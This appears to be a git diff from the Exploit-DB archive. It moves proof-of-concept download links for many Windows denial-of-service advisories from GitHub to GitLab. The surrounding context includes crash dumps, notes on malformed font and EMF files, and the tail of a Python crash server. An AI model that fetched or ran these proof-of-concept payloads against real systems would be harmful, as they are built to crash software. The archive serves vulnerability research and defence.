b/exploits/windows/dos/40666.txt @@ -52,4 +52,4 @@ Arg4: 0000000000000000, Reserved Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40666.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40666.zip \ No newline at end of file diff --git a/exploits/windows/dos/40667.txt b/exploits/windows/dos/40667.txt index f927c0ecf..b323856e1 100644 --- a/exploits/windows/dos/40667.txt +++ b/exploits/windows/dos/40667.txt @@ -28,4 +28,4 @@ ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 000000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40667.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40667.zip \ No newline at end of file diff --git a/exploits/windows/dos/40668.txt b/exploits/windows/dos/40668.txt index 13cf48823..a7d245926 100644 --- a/exploits/windows/dos/40668.txt +++ b/exploits/windows/dos/40668.txt @@ -51,4 +51,4 @@ ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 000000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40668.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40668.zip \ No newline at end of file diff --git a/exploits/windows/dos/40744.txt b/exploits/windows/dos/40744.txt index 7d9097cf0..faae54069 100644 --- a/exploits/windows/dos/40744.txt +++ b/exploits/windows/dos/40744.txt @@ -77,7 +77,7 @@ Proof of concept A proof of concept is available at the following URL: https://github.com/lgandx/PoC/tree/master/LSASS -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40744.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40744.zip This proof of concept is fully automated and includes non-vulnerable detection. diff --git a/exploits/windows/dos/40745.c b/exploits/windows/dos/40745.c index 842db87a0..77f71ccdc 100644 --- a/exploits/windows/dos/40745.c +++ b/exploits/windows/dos/40745.c @@ -4,7 +4,7 @@ Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255 Full Proof of Concept: https://github.com/tinysec/public/tree/master/CVE-2016-7255 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip ******************************************************************** Created: 2016-11-09 14:23:09 diff --git a/exploits/windows/dos/40766.txt b/exploits/windows/dos/40766.txt index 5a78dd254..5663cd965 100644 --- a/exploits/windows/dos/40766.txt +++ b/exploits/windows/dos/40766.txt @@ -49,4 +49,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40766.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40766.zip \ No newline at end of file diff --git a/exploits/windows/dos/41025.txt b/exploits/windows/dos/41025.txt index fa17b2774..948994dd4 100644 --- a/exploits/windows/dos/41025.txt +++ b/exploits/windows/dos/41025.txt @@ -22,4 +22,4 @@ is a potential for remote code execution via a malicious media file. POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41025.mov \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41025.mov \ No newline at end of file diff --git a/exploits/windows/dos/4121.txt b/exploits/windows/dos/4121.txt index 0a3dd0f9b..1b0862ee8 100644 --- a/exploits/windows/dos/4121.txt +++ b/exploits/windows/dos/4121.txt @@ -4,6 +4,6 @@ http://www.ph4nt0m.org Tested on: Full Patched Excel 2003 Sp2, CN -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4121.zip (06272007-2670.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip) # milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/exploits/windows/dos/41222.py b/exploits/windows/dos/41222.py index 948c0a6ce..0203e0a28 100755 --- a/exploits/windows/dos/41222.py +++ b/exploits/windows/dos/41222.py @@ -1,5 +1,5 @@ # Full Proof of Concept: -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41222.zip +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41222.zip import sys, struct, SocketServer from odict import OrderedDict diff --git a/exploits/windows/dos/41363.txt b/exploits/windows/dos/41363.txt index 57e6d1304..219d91457 100644 --- a/exploits/windows/dos/41363.txt +++ b/exploits/windows/dos/41363.txt @@ -28,4 +28,4 @@ It is strongly advised to perform a careful audit of all EMF record handlers res Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41363.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41363.zip \ No newline at end of file diff --git a/exploits/windows/dos/41364.txt b/exploits/windows/dos/41364.txt index 48acdac1e..cddd88985 100644 --- a/exploits/windows/dos/41364.txt +++ b/exploits/windows/dos/41364.txt @@ -38,4 +38,4 @@ fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`266230 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41364.zip \ No newline at end of file diff --git a/exploits/windows/dos/41365.txt b/exploits/windows/dos/41365.txt index e5bd28f07..17eab1b3c 100644 --- a/exploits/windows/dos/41365.txt +++ b/exploits/windows/dos/41365.txt @@ -74,4 +74,4 @@ Resetting default scope Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41365.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41365.zip \ No newline at end of file diff --git a/exploits/windows/dos/41367.txt b/exploits/windows/dos/41367.txt index 7a27e2fab..c9d38d4ef 100644 --- a/exploits/windows/dos/41367.txt +++ b/exploits/windows/dos/41367.txt @@ -9,7 +9,7 @@ POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41367.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41367.zip Open the malicious fpx file with CTRL+U, served by a webserver: @@ -76,4 +76,4 @@ Invalid exception stack at ffffffff 2017-02-09 information sent with the PoC -no reply if they plan to release a fix or not +no reply if they plan to release a fix or not \ No newline at end of file diff --git a/exploits/windows/dos/41417.txt b/exploits/windows/dos/41417.txt index c5ba07bda..589c090a9 100644 --- a/exploits/windows/dos/41417.txt +++ b/exploits/windows/dos/41417.txt @@ -80,4 +80,4 @@ In this crash eax is pointing to an invalid memory region and is being dereferen Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41417.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41417.zip \ No newline at end of file diff --git a/exploits/windows/dos/41418.txt b/exploits/windows/dos/41418.txt index 7a804d43b..4593866f6 100644 --- a/exploits/windows/dos/41418.txt +++ b/exploits/windows/dos/41418.txt @@ -113,4 +113,4 @@ Looking at the logic flow from this function we see at the very first call to ms Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41418.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41418.zip \ No newline at end of file diff --git a/exploits/windows/dos/41419.txt b/exploits/windows/dos/41419.txt index 0d95aa0f3..4ba015346 100644 --- a/exploits/windows/dos/41419.txt +++ b/exploits/windows/dos/41419.txt @@ -72,4 +72,4 @@ The issue here is that when dbcs_flag is false the 4 byte boundary version can a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41419.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41419.zip \ No newline at end of file diff --git a/exploits/windows/dos/41474.py b/exploits/windows/dos/41474.py index fb3e26f9b..228fc5a12 100755 --- a/exploits/windows/dos/41474.py +++ b/exploits/windows/dos/41474.py @@ -27,4 +27,4 @@ while True: conn.send('220 '+buffer+'\r\n') conn.recv(1024) conn.send('250 '+buffer+'\r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/dos/41645.txt b/exploits/windows/dos/41645.txt index ab47a045f..33e72d20a 100644 --- a/exploits/windows/dos/41645.txt +++ b/exploits/windows/dos/41645.txt @@ -77,4 +77,4 @@ Since the additional detail is crucial to observe the symptoms of the bug and it Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41645.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip \ No newline at end of file diff --git a/exploits/windows/dos/41646.txt b/exploits/windows/dos/41646.txt index 08336d9a1..5ea40da70 100644 --- a/exploits/windows/dos/41646.txt +++ b/exploits/windows/dos/41646.txt @@ -49,4 +49,4 @@ Attached is an archive with the original and modified TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41646.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip \ No newline at end of file diff --git a/exploits/windows/dos/41647.txt b/exploits/windows/dos/41647.txt index b9a3eef1a..790d045a0 100644 --- a/exploits/windows/dos/41647.txt +++ b/exploits/windows/dos/41647.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41647.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip \ No newline at end of file diff --git a/exploits/windows/dos/41648.txt b/exploits/windows/dos/41648.txt index 6ff9cf469..fb946daa8 100644 --- a/exploits/windows/dos/41648.txt +++ b/exploits/windows/dos/41648.txt @@ -64,4 +64,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip \ No newline at end of file diff --git a/exploits/windows/dos/41649.txt b/exploits/windows/dos/41649.txt index 5777ce853..9541fe83c 100644 --- a/exploits/windows/dos/41649.txt +++ b/exploits/windows/dos/41649.txt @@ -55,4 +55,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41649.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip \ No newline at end of file diff --git a/exploits/windows/dos/41650.txt b/exploits/windows/dos/41650.txt index fadff6b59..d5bc8ca30 100644 --- a/exploits/windows/dos/41650.txt +++ b/exploits/windows/dos/41650.txt @@ -61,4 +61,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41650.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip \ No newline at end of file diff --git a/exploits/windows/dos/41651.txt b/exploits/windows/dos/41651.txt index eeea6e0f6..b011b615e 100644 --- a/exploits/windows/dos/41651.txt +++ b/exploits/windows/dos/41651.txt @@ -85,4 +85,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41651.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip \ No newline at end of file diff --git a/exploits/windows/dos/41652.txt b/exploits/windows/dos/41652.txt index 6fd81bfde..73f7f5b0f 100644 --- a/exploits/windows/dos/41652.txt +++ b/exploits/windows/dos/41652.txt @@ -66,4 +66,4 @@ Attached is an archive with 3 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41652.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip \ No newline at end of file diff --git a/exploits/windows/dos/41653.txt b/exploits/windows/dos/41653.txt index cc8e3b9f8..3d3b3e613 100644 --- a/exploits/windows/dos/41653.txt +++ b/exploits/windows/dos/41653.txt @@ -72,4 +72,4 @@ Attached is an archive with 2 crashing samples. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip \ No newline at end of file diff --git a/exploits/windows/dos/41654.txt b/exploits/windows/dos/41654.txt index 8566a9214..aa8eeb0a2 100644 --- a/exploits/windows/dos/41654.txt +++ b/exploits/windows/dos/41654.txt @@ -28,4 +28,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41654.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip \ No newline at end of file diff --git a/exploits/windows/dos/41655.txt b/exploits/windows/dos/41655.txt index a063655d2..5b8f4678d 100644 --- a/exploits/windows/dos/41655.txt +++ b/exploits/windows/dos/41655.txt @@ -40,4 +40,4 @@ Attached is an archive with textual crash excerpts and up to 3 samples per each Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41655.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip \ No newline at end of file diff --git a/exploits/windows/dos/41656.txt b/exploits/windows/dos/41656.txt index 2ac50d682..3807c7a45 100644 --- a/exploits/windows/dos/41656.txt +++ b/exploits/windows/dos/41656.txt @@ -37,4 +37,4 @@ Attached is an archive with two samples, which trigger crashes at two different Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41656.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip \ No newline at end of file diff --git a/exploits/windows/dos/41657.txt b/exploits/windows/dos/41657.txt index e5a44ae62..379ccbbd9 100644 --- a/exploits/windows/dos/41657.txt +++ b/exploits/windows/dos/41657.txt @@ -80,4 +80,4 @@ Attached is a color profile which triggers the above crash. In order to reproduc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41657.zip \ No newline at end of file diff --git a/exploits/windows/dos/41658.txt b/exploits/windows/dos/41658.txt index 047c3f282..aa255d0c5 100644 --- a/exploits/windows/dos/41658.txt +++ b/exploits/windows/dos/41658.txt @@ -45,4 +45,4 @@ Attached is ane EMF file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41658.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41658.zip \ No newline at end of file diff --git a/exploits/windows/dos/41659.txt b/exploits/windows/dos/41659.txt index 2b726908e..e15305bbd 100644 --- a/exploits/windows/dos/41659.txt +++ b/exploits/windows/dos/41659.txt @@ -27,4 +27,4 @@ Attached are two color profiles which trigger the crash at two different offsets Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41659.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41659.zip \ No newline at end of file diff --git a/exploits/windows/dos/41661.html b/exploits/windows/dos/41661.html index 814a8535b..2040814bd 100644 --- a/exploits/windows/dos/41661.html +++ b/exploits/windows/dos/41661.html @@ -126,5 +126,5 @@ where the old value was deleated at Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable. Screenshots: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41661.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip --> \ No newline at end of file diff --git a/exploits/windows/dos/41737.txt b/exploits/windows/dos/41737.txt index 17fb48af8..c81c3a298 100644 --- a/exploits/windows/dos/41737.txt +++ b/exploits/windows/dos/41737.txt @@ -44,7 +44,4 @@ Tested on: Windows 7 -Win xp - - - +Win xp \ No newline at end of file diff --git a/exploits/windows/dos/41756.txt b/exploits/windows/dos/41756.txt index 239dbef62..a7907c344 100644 --- a/exploits/windows/dos/41756.txt +++ b/exploits/windows/dos/41756.txt @@ -91,4 +91,4 @@ According to my tests, the copied bytes are always 0x00, so that's why it seems Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41756.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41756.zip \ No newline at end of file diff --git a/exploits/windows/dos/41879.txt b/exploits/windows/dos/41879.txt index 3beece78d..48d13d807 100644 --- a/exploits/windows/dos/41879.txt +++ b/exploits/windows/dos/41879.txt @@ -151,4 +151,4 @@ Attached is a PoC program for Windows 7 32-bit (usermode_oob_write.cpp), and a b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41879.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41879.zip \ No newline at end of file diff --git a/exploits/windows/dos/42009.txt b/exploits/windows/dos/42009.txt index 3cc8d2941..cee88b818 100644 --- a/exploits/windows/dos/42009.txt +++ b/exploits/windows/dos/42009.txt @@ -209,4 +209,4 @@ The issue reproduces on Windows 7, and is easiest to observe with Special Pools Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42009.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42009.zip \ No newline at end of file diff --git a/exploits/windows/dos/42021.txt b/exploits/windows/dos/42021.txt index 50b5b0a75..d4398cf77 100644 --- a/exploits/windows/dos/42021.txt +++ b/exploits/windows/dos/42021.txt @@ -87,4 +87,4 @@ It did it! Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42021.zip \ No newline at end of file diff --git a/exploits/windows/dos/42081.txt b/exploits/windows/dos/42081.txt index 852d7d2b7..5fd67f7d5 100644 --- a/exploits/windows/dos/42081.txt +++ b/exploits/windows/dos/42081.txt @@ -32,4 +32,4 @@ Attached is a ZIP archive (password: "mpengbugs") with up to 3 testcases for eac Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42081.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42081.zip \ No newline at end of file diff --git a/exploits/windows/dos/42088.txt b/exploits/windows/dos/42088.txt index cd9f4584e..559556ab5 100644 --- a/exploits/windows/dos/42088.txt +++ b/exploits/windows/dos/42088.txt @@ -68,4 +68,4 @@ String.prototype.slice.call(x, l); Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42088.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42088.zip \ No newline at end of file diff --git a/exploits/windows/dos/42092.txt b/exploits/windows/dos/42092.txt index 786fff2fb..9f8ca478b 100644 --- a/exploits/windows/dos/42092.txt +++ b/exploits/windows/dos/42092.txt @@ -8,4 +8,4 @@ The password of the zip file is "calleruaf" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42092.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42092.zip \ No newline at end of file diff --git a/exploits/windows/dos/42214.txt b/exploits/windows/dos/42214.txt index 63ea07605..060a5ec6e 100644 --- a/exploits/windows/dos/42214.txt +++ b/exploits/windows/dos/42214.txt @@ -41,4 +41,4 @@ The issue can be reproduced by running the attached proof-of-concept program on Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42214.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42214.zip \ No newline at end of file diff --git a/exploits/windows/dos/42230.txt b/exploits/windows/dos/42230.txt index a4f57801f..64b594842 100644 --- a/exploits/windows/dos/42230.txt +++ b/exploits/windows/dos/42230.txt @@ -29,4 +29,4 @@ Repeatedly triggering the vulnerability could allow local authenticated attacker Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42230.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42230.zip \ No newline at end of file diff --git a/exploits/windows/dos/42234.txt b/exploits/windows/dos/42234.txt index 5cfa6ac16..6271eb83a 100644 --- a/exploits/windows/dos/42234.txt +++ b/exploits/windows/dos/42234.txt @@ -81,4 +81,4 @@ Attached are 6 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42234.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42234.zip \ No newline at end of file diff --git a/exploits/windows/dos/42235.txt b/exploits/windows/dos/42235.txt index 7e0cdfc97..2d0b8a1fc 100644 --- a/exploits/windows/dos/42235.txt +++ b/exploits/windows/dos/42235.txt @@ -76,4 +76,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42235.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42235.zip \ No newline at end of file diff --git a/exploits/windows/dos/42236.txt b/exploits/windows/dos/42236.txt index c3d29f3d4..662417f5b 100644 --- a/exploits/windows/dos/42236.txt +++ b/exploits/windows/dos/42236.txt @@ -44,4 +44,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42236.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42236.zip \ No newline at end of file diff --git a/exploits/windows/dos/42237.txt b/exploits/windows/dos/42237.txt index 2bda019a8..12e74a17f 100644 --- a/exploits/windows/dos/42237.txt +++ b/exploits/windows/dos/42237.txt @@ -42,4 +42,4 @@ Attached is a proof of concept malformed font file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42237.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42237.zip \ No newline at end of file diff --git a/exploits/windows/dos/42238.txt b/exploits/windows/dos/42238.txt index 9e3a2dca0..77b248805 100644 --- a/exploits/windows/dos/42238.txt +++ b/exploits/windows/dos/42238.txt @@ -46,4 +46,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42238.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42238.zip \ No newline at end of file diff --git a/exploits/windows/dos/42239.txt b/exploits/windows/dos/42239.txt index b88f5dad5..c6c29e9c5 100644 --- a/exploits/windows/dos/42239.txt +++ b/exploits/windows/dos/42239.txt @@ -73,4 +73,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42239.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42239.zip \ No newline at end of file diff --git a/exploits/windows/dos/42240.txt b/exploits/windows/dos/42240.txt index 3e87725c9..f4cc1873c 100644 --- a/exploits/windows/dos/42240.txt +++ b/exploits/windows/dos/42240.txt @@ -44,4 +44,4 @@ Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42240.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42240.zip \ No newline at end of file diff --git a/exploits/windows/dos/42241.txt b/exploits/windows/dos/42241.txt index 42b24973c..30ccd357c 100644 --- a/exploits/windows/dos/42241.txt +++ b/exploits/windows/dos/42241.txt @@ -46,4 +46,4 @@ Attached are 2 proof of concept malformed font files which trigger the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42241.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42241.zip \ No newline at end of file diff --git a/exploits/windows/dos/42243.txt b/exploits/windows/dos/42243.txt index 2c7f68d28..5be7e826a 100644 --- a/exploits/windows/dos/42243.txt +++ b/exploits/windows/dos/42243.txt @@ -82,4 +82,4 @@ The issue reproduces on Windows 7 (other platforms untested). It is easiest to r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42243.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42243.zip \ No newline at end of file diff --git a/exploits/windows/dos/42264.txt b/exploits/windows/dos/42264.txt index 17c0758b9..b4ffd52ff 100644 --- a/exploits/windows/dos/42264.txt +++ b/exploits/windows/dos/42264.txt @@ -159,4 +159,4 @@ ChildEBP RetAddr Args to Child Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42264.zip \ No newline at end of file diff --git a/exploits/windows/dos/42480.txt b/exploits/windows/dos/42480.txt index cdd5904ae..a795b6a0d 100644 --- a/exploits/windows/dos/42480.txt +++ b/exploits/windows/dos/42480.txt @@ -4,4 +4,4 @@ The attached fuzzed swf file causes the traits of an ActionScript object to be a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42480.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42480.zip \ No newline at end of file diff --git a/exploits/windows/dos/42741.cpp b/exploits/windows/dos/42741.cpp index 6a0ed80a5..af55ea1ad 100644 --- a/exploits/windows/dos/42741.cpp +++ b/exploits/windows/dos/42741.cpp @@ -123,4 +123,4 @@ int main(int argc, char **argv) { DeleteDC(hdc); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42742.cpp b/exploits/windows/dos/42742.cpp index d7106f7c7..98e0ee717 100644 --- a/exploits/windows/dos/42742.cpp +++ b/exploits/windows/dos/42742.cpp @@ -153,4 +153,4 @@ int main() { DestroyWindow(hwnd); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42744.txt b/exploits/windows/dos/42744.txt index 17560365e..00eca5ce3 100644 --- a/exploits/windows/dos/42744.txt +++ b/exploits/windows/dos/42744.txt @@ -121,4 +121,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42744.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42744.zip \ No newline at end of file diff --git a/exploits/windows/dos/42746.txt b/exploits/windows/dos/42746.txt index 3f6ff20dc..a48bd26c7 100644 --- a/exploits/windows/dos/42746.txt +++ b/exploits/windows/dos/42746.txt @@ -110,4 +110,4 @@ Attached is an archive with several proof-of-concept mutated TTF files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42746.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42746.zip \ No newline at end of file diff --git a/exploits/windows/dos/42747.cpp b/exploits/windows/dos/42747.cpp index f9894cdad..8dbf31337 100644 --- a/exploits/windows/dos/42747.cpp +++ b/exploits/windows/dos/42747.cpp @@ -84,4 +84,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42749.cpp b/exploits/windows/dos/42749.cpp index 7e489417e..1fe46497c 100644 --- a/exploits/windows/dos/42749.cpp +++ b/exploits/windows/dos/42749.cpp @@ -151,4 +151,4 @@ int main() { DeleteDC(pd.hDC); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42750.cpp b/exploits/windows/dos/42750.cpp index 89a90b8dd..6348d3fcc 100644 --- a/exploits/windows/dos/42750.cpp +++ b/exploits/windows/dos/42750.cpp @@ -116,4 +116,4 @@ int main() { PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/42758.txt b/exploits/windows/dos/42758.txt index e2d765f60..f37b97cbc 100644 --- a/exploits/windows/dos/42758.txt +++ b/exploits/windows/dos/42758.txt @@ -112,4 +112,4 @@ edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructo Proof of 